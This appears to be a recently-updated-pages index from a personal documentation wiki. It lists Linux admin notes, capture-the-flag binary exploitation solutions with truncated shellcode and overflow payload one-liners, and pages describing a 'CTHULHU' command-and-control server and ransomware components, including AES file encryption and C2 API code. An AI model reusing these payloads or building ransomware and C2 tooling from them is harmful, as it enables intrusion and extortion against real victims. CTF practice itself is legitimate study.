Skip to main content

Recently Updated Pages

Exclude package from update

Linux documentation

To Exclude apt-mark hold <package> To unexclude apt-mark unhold <package> To list on hold packa...

Updated 1 year ago by Makito

.ssh/config file

Linux documentation

vim /home/$USER/.ssh/config Host <name> Hostname <ip> User <user> Port <PORT> IdentityFil...

Updated 1 year ago by Makito

Rudder

Linux tools

Installation rudder server wget --quiet -O /etc/apt/trusted.gpg.d/rudder_apt_key.gpg "https://rep...

Updated 1 year ago by Makito

ELF x86 - Format String Bug Basic 3

Exploitation de binaire avancé

app-systeme-ch17@challenge02:~$ export SHELLCODE=`python -c 'print("\x6a\x0b\x58\x99\x52\x66\x68\...

Updated 1 year ago by Makito

ELF x86 - Stack buffer overflow basic 6

Exploitation de binaire avancé

app-systeme-ch33@challenge02:~$ ./ch33 $(python -c 'print "A"*32 + "\xb0\x70\xe6\xb7" + "\xf0\xab...

Updated 1 year ago by Makito

ELF x86 - Use After Free - basic

Exploitation de binaire avancé

app-systeme-ch63@challenge03:~$ printf "1\ntoto\n4\n5\nAAAABBBBCCCC\xcb\x87\x04\ x08\nhome\n7\n3\...

Updated 1 year ago by Makito

ELF x64 - Double free

Exploitation de binaire avancé

"1 → 5 → 1 → 3 → 7 → 1 → 4 → 5 → 1 → 5 → 2 → 1 → 7 → 1"

Updated 1 year ago by Makito

ELF x64 - Basic heap overflow

Exploitation de binaire avancé

import pwn USER = "app-systeme-ch94" PASS = "app-systeme-ch94" def main(): s = pwn.ssh(USER, "ch...

Updated 1 year ago by Makito

ELF x86 - BSS buffer overflow

Exploitation de binaire avancé

./ch7 `python -c 'print "\x90"*483 + "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68\x6...

Updated 1 year ago by Makito

ELF x64 - Stack buffer overflow - basic

Exploitation de binaire avancé

$ (python -c 'print "A"*280+"\xcd\x06\x40\x00\x00\x00\x00\x00"'; cat) | ./ch35

Updated 1 year ago by Makito

ELF x86 - Stack buffer overflow basic 2

Exploitation de binaire avancé

$ (python -c 'print "A"*128 +"\x64\x84\x04\x08" ' ;cat) | ./ch15

Updated 1 year ago by Makito

ELF x86 - Format string bug basic 2

Exploitation de binaire avancé

import struct CHECK_ADDR = <addr> exploit = "" exploit += struct.pack("I", CHECK_ADDR) #...

Updated 1 year ago by Makito

ELF x64 - Stack buffer overflow - PIE

Exploitation de binaire avancé

shell 1: app-systeme-ch83@challenge03:~$ python -c 'import struct; print("A"*0x28 + struct.pack("...

Updated 1 year ago by Makito

Docker Compose Setup

CTHULHU Infrastructure

To simplify the deployment and management of the API and its dependencies, Docker Compose is used...

Updated 1 year ago by Makito

Docker Container Setup

CTHULHU Infrastructure

The API is designed to run inside a Docker container. The container includes the necessary depend...

Updated 1 year ago by Makito

View

CTHULHU C2

Agent View In this page you can see all the agents that are connected to the C2.

Updated 1 year ago by Makito

Database

CTHULHU C2

Database Schema Documentation Table: agent This table stores information about agents. Column ...

Updated 1 year ago by Makito

API connection

CTHULHU Ransomware

Overview This code provides a C2API struct that encapsulates functionalities related to interacti...

Updated 1 year ago by Makito

Main.rs

CTHULHU Ransomware

Overview This code represents an entry point for a program that performs certain actions based on...

Updated 1 year ago by Makito

Encryption / Decryption files

CTHULHU Ransomware

Overview This code provides functions for encrypting and decrypting files using AES-256 CTR encry...

Updated 1 year ago by Makito